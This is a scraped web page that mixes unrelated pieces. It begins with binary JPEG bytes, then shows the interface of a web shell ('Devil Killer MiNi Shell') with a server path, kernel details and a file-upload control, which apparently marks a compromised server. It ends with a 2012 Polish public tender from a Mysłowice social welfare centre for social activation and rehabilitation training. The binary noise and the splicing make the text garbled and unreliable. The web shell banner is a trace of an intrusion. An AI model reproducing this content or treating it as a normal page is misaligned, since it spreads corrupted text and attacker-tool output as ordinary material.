JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120516/158332-N-2012.html

<p class="kh_header"><b>Mysłowice: Szkolenia w zakresie aktywizacji społecznej uczestników projektu Mysłowickie lepsze jutro</b><br>
<b>Numer ogłoszenia: 158332 - 2012; data zamieszczenia: 16.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Gwarków 24, 41-400 Mysłowice, woj. śląskie, tel. 032 2221289, faks 032 2221289.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia w zakresie aktywizacji społecznej uczestników projektu Mysłowickie lepsze jutro.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1: Trening kompetencji społecznych (wyjazdowy).
Część 2: Warsztaty niezależnego funkcjonowania z niepełnosprawnością wraz z zajęciami rehabilitacyjnymi oraz zespołem ćwiczeń usprawniających psychoruchowo (wyjazdowe).
Część 3: Trening umiejętności społecznych z elementami planowania rodziny (wyjazdowy)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie wypełnionego załacznika nr 1 do wniosku na zasadzie spełnia/niespełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie wypełnionego załacznika nr 1 do wniosku na zasadzie spełnia/niespełnia oraz wypełnionego załącznika nr 2 do wniosku, za który zostaną przyznane punkty wg. wzoru:
D = ilość wykazanych usług szkoleniowych w badanym wniosku/maksymalna ilość wykazanych usług szkoleniowych spośród wszystkich wniosków x 100 pkt x 30%</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie wypełnionego załacznika nr 1 do wniosku na zasadzie spełnia/niespełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie wypełnionego załacznika nr 1 do wniosku na zasadzie spełnia/niespełnia oraz wypełnionego załącznika nr 2A do wniosku, za który zostaną przyznane punkty wg. wzoru:
K =   ilość przeprowadzonych usług szkoleniowych przez daną osobę, która będzie uczestniczyć w wykonaniu zamówienia / maksymalna ilość przeprowadzonych usług szkoleniowych spośród wszystkich wykazanych osób we wszystkich wnioskach x 100 pkt x70%/ilość wykazanych osób w danym wniosku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie wypełnionego załacznika nr 1 do wniosku na zasadzie spełnia/niespełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Wykonawcy, którzy spełniaja warunki udziału w postepowaniu i zdobędą największą liczbę punktów za doświadczenie D i kadrę K</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - program szkolenia - 30</li>
<li>3 - miejsce szkolenia - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić na wniosek wykonawcy za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany w zakresie osób prowadzących szkolenie pod warunkiem że będą miały doświadczenie nie gorsze od doświadczenia osób wykazanych w załączniku nr 2A do wniosku oraz terminu realizacji umowy z przyczyn niezależnych od wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.myslowice.bip.info.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Osrodek Pomocy Społecznej w Mysłowicach 
ul.Gwarków 24
41-400 Mysłowic
pok. 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2012 godzina 10:00, miejsce: Miejski Osrodek Pomocy Społecznej w Mysłowicach 
ul.Gwarków 24
41-400 Mysłowic
pok. 27 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zadanie w ramach projektu współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 Mysłowickie lepsze jutro w ramach działania 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> TRENING KOMPETENCJI SPOŁECZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 20 osób dorosłych - uczestników/uczestniczek projektu 
Liczba dzieci wymagających opieki podczas zajęć ich rodzica: 20 (w wieku od 1 do 13 lat) 
Czas trwania: 8 dni (7 noclegów) w terminie: 2-14.07.2012 r.(pobyt powinien rozpocząć się i zakończyć obiadem)
Liczba godzin zajęć w formie warsztatów: 30 godzin lekcyjnych  na osobę (8 dni)
Zajęcia w dwóch grupach szkoleniowych.
Zakres tematyczny usługi przewidzianej do wykonania w szczególności obejmuje:  
1) komunikacja interpersonalna i asertywność w kontaktach międzyludzkich,
2) przyczyny stresu i jego niwelowanie; 
3) efektywna motywacja i stawianie sobie nowych wyzwań; 
4) zarządzanie konfliktem i efektywne rozwiązywanie konfliktów,
Cel szkolenia: Podniesienie kompetencji społecznych uczestników projektu. Osiągnięcie w-w. rezultatów należy udokumentować w szczególności wykorzystując takie narzędzia jak ankiety, testy itp. 
Materiały dydaktyczne i inne: 
Wykonawca w celu realizacji przedmiotu zamówienia zapewni optymalną ilość materiałów niezbędnych do przeprowadzenia spotkań (np. podręcznik w wydaniu książkowym o treści zgodnej z tematyką spotkań, zeszyt min. 60 kartkowy, ołówek, długopis, teczka na materiały). 
Opieka nad uczestnikami: 
Wykonawca zapewni ze swej strony koordynatora działań pobytu odpowiedzialnego za zbiórkę, dowóz uczestników wyjazdu tam i z powrotem, zapewnienie bezpieczeństwa oraz organizację zajęć oraz czasu wolnego i wypoczynku. 
Opieka nad dziećmi: 
1. Wykonawca na czas nieobecności osób dorosłych (odbywających zajęcia w ramach nin. zamówienia) winien zapewnić opiekę nad małoletnimi dziećmi dostosowaną do wieku dzieci i sprawowaną przez doświadczoną kadrę (min. 4 opiekunki). 
2. Wykonawca winien zapewnić co najmniej 4 propozycje animacji dla dzieci biorąc także pod uwagę wystąpienie niesprzyjających warunków atmosferycznych (uwzględniając  w szczególności: zabawy ruchowe na powietrzu, spacer po okolicy z możliwością zwiedzenia miejscowych atrakcji, kino, przejście na miejscowy plac zabaw, zajęcia plastyczno-ruchowe na terenie Ośrodka itp). 
Zakwaterowanie: 
1. Obiekt powinien mieścić się  w miejscowości atrakcyjnej pod względem turystycznym, oddalonej do 200km od siedziby zamawiającego, posiadać salę szkoleniową, winien dysponować  salą gimnastyczną, siłownią. 
2. Wykonawca zapewni uczestnikom zakwaterowanie w pokojach 2-4 osobowych z pełnym węzłem sanitarnym tj. umywalką, WC, prysznicem z ciepłą i zimną wodą, dostępem do TV, wyposażonych w łóżka jednoosobowe, stolik, krzesła oraz szafki na odzież. Uczestnicy zostaną zakwaterowani 
w sposób uwzględniający płeć lub rodzinę (rodzic z dziećmi), a w przypadku nieparzystej liczby osób zapewniony zostanie pokój jednoosobowy lub dwuosobowy do pojedynczego wykorzystania. 
3.Wykonawca zapewni dostępność wody mineralnej w pokojach w ilości 1,5 l dziennie na 1 osobę dorosłą. 
Wyżywienie: 
1. Wykonawca zapewni w cenie usługi pełne i urozmaicone wyżywienie polegające na przygotowaniu i zaserwowaniu 3 posiłków dziennie (za wyjątkiem dnia przyjazdu i wyjazdu) na każdego uczestnika wyjazdu  w postaci: śniadania w formie szwedzkiego stołu, dwudaniowego obiadu(z porcją mięsa lub ryby) z deserem i napojem oraz  kolacji. Zamawiający nie dopuszcza możliwości serwowania ciepłego obiadu w formie dań gotowych typu fast food oraz gotowych zup typu instant. Z uwagi na obecność dzieci Wykonawca winien uwzględnić potrzeby żywieniowe tej grupy zapewniając rodzicom na ich życzenie dostęp do takich produktów żywnościowych jak np. gorące mleko, płatki śniadaniowe, czekolada lub kakao w proszku (w szczególności podczas śniadania i kolacji)
2.W trakcie odbywania zajęć warsztatowych Wykonawca zapewni codziennie uczestnikom poczęstunek w postaci: dobrej jakości kawy i herbaty (bez ograniczeń), mieszanych drobnych artykułów spożywczych (np. paluszki, krakersy, kruche ciasteczka, babeczki, rurki w ilości min. 100 gr. na osobę), zimnych napojów (np. woda mineralna, soki w ilości 0,5 l na osobę) oraz dodatki takie jak: cukier, mleczko, cytryna. W trakcie sprawowania opieki nad dziećmi, Wykonawca winien zaplanować przerwy w zajęciach animacyjnych, podczas których dzieci będą mogły spożyć drobną przekąskę składającą się z zestawu: np. drożdżówka/pączek/porcja owoców sezonowych oraz napoju np. woda mineralna, soki w ilości 0,5 l na jedno dziecko. 
Transport: 
1. Wykonawca zapewni w cenie usługi transport uczestników i ich bagażu na miejsce i z powrotem wykonywania usługi - pojazdem z ilością miejsc pozwalającą na komfortowe, swobodne podróżowanie zgłoszonej do wyjazdu grupie uczestników, sprawnym technicznie, dopuszczonym do ruchu drogowego. 
2. Miejsce wyjazdu i powrotu uczestników i uczestniczek wskaże Zamawiający (na terenie gminy Mysłowice). 
3. W drodze powrotnej - na czas podróży, Wykonawca zapewni każdemu uczestnikowi wyjazdu napoje na drogę (np. woda mineralna, soki w ilości 0,5 l na osobę). 
Czas wolny: 
W czasie wolnym od zajęć należy zapewnić uczestnikom  oraz ich dzieciom efektywną i atrakcyjną organizację czasu wolnego. Wykonawca winien zapewnić co najmniej cztery formy organizacji czasu wolnego (w tym wycieczkę po okolicy), w szczególności wykorzystując dostępność miejscowych atrakcji takich jak źródła termalne, skanseny dawnej zabudowy, obiekty muzealne (stałe i czasowe ekspozycje), parki krajobrazowe  itp. W przypadku, gdy proponowana animacja znajduje się poza obiektem, Wykonawca zapewni transport autokarem tam i z powrotem. 
Wymagania dodatkowe: 
1. Wykonawca winien ubezpieczyć wszystkich uczestników wyjazdu od następstw nieszczęśliwych wypadków na okres od dnia rozpoczęcia realizacji przedmiotu zamówienia do dnia jego zakończenia.  
2. Wykonawca zapewni oznakowanie pomieszczeń, w których będą odbywały się zajęcia zgodnie z aktualnymi wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki, a także zamieszczenie znaków: logo Kapitał Ludzki Narodowa Strategia Spójności, logo Unii Europejskiej z Europejskim Funduszem Społecznym oraz umieszczenie informacji o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Odpowiednie oznakowanie winno znaleźć się również na dokumentach związanych z realizacja warsztatów oraz materiałach przekazywanych uczestnikom warsztatów.
3. Wykonawca zrealizuje dokumentację fotograficzną szkolenia (na płycie CD).

Pod uwagę brane będą następujące czynniki: program (szkolenia, 4 propozycji na spędzanie czasu po zajęciach oraz animacji dla dzieci), cena, lokalizacja- miejsce oraz warunki szkolenia. 
Zajęcia szkoleniowe, zakwaterowanie, wyżywienie oraz sprawowanie opieki nad dziećmi Wykonawca winien zapewnić w obrębie jednego obiektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. program szkolenia - 30</li>
<li>3. miejsce szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warsztaty niezależnego funkcjonowania z niepełnosprawnością dla osób niepełnosprawnych wraz z zajęciami rehabilitacyjnymi i zespołem ćwiczeń fizycznych usprawniających psychoruchowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 16 osób dorosłych - uczestników/uczestniczek projektu 
Liczba dzieci wymagających opieki podczas zajęć ich rodzica: 4 (w wieku od 6 do 12 lat) 
Czas trwania: 8 dni (7 noclegów)w terminie: 2-14.07. 2012 r. (pobyt powinien rozpocząć się i zakończyć obiadem)
Liczba godzin zajęć w formie warsztatów: 20 godzin lekcyjnych  na osobę (8 dni)
Zajęcia w dwóch grupach szkoleniowych.
Liczba zajęć rehabilitacyjnych przypadająca na jednego uczestnika: min.15 zajęć (średnio 2 zajęcia na dzień) 
Liczba zajęć fizycznych usprawniających psychoruchowo przypadająca na jednego uczestnika: 1 zajęcia dziennie (za wyjątkiem dnia przyjazdu) 

Zakres tematyczny usługi przewidzianej do wykonania w szczególności obejmuje: 
1. W ramach zajęć w formie warsztatów: 
1) praca nad tożsamością, postawami, rolami i przekonaniami; 
2) sposoby radzenia sobie ze stresem i techniki relaksacji; 
3) nie uleganie stereotypom i stygmatyzacji; 
4) radzenie sobie z codziennymi barierami związanymi z niepełnosprawnością,
5) podniesienie samooceny, pewności siebie, poczucia własnej wartości. 
2. W ramach zajęć fizycznych usprawniających psychoruchowo: 
1) zajęcia na basenie (np. aerobik); 
2) zajęcia na sali z ewentualnym wykorzystaniem różnych przyrządów do ćwiczeń (np. fitness); 
3) gimnastyka ogólnorozwojowa na sali lub na powietrzu (np. marsze z kijkami - Nordic Walking, tenis stołowy). 
3. W ramach zajęć rehabilitacyjnych: 
1) zajęcia w gabinetach fizjoterapeutycznych itp. według indywidualnych zaleceń lekarza na podstawie informacji o stanie zdrowia uzyskanych przez lekarza podczas badania lekarskiego oraz w oparciu o dokumentację medyczną uczestnika; 
2) przykładowe rodzaje zajęć przewidzianych w zamówieniu: elektroterapia, masaże suche i mokre, kąpiele lecznicze, gimnastyka, fizykoterapia, prądy Bernarda, jonoforeza, światłolecznictwo, inhalacje/gimnastyka oddechowa, lasery, ultradźwięki, magnetoterapia, okłady borowinowe. 
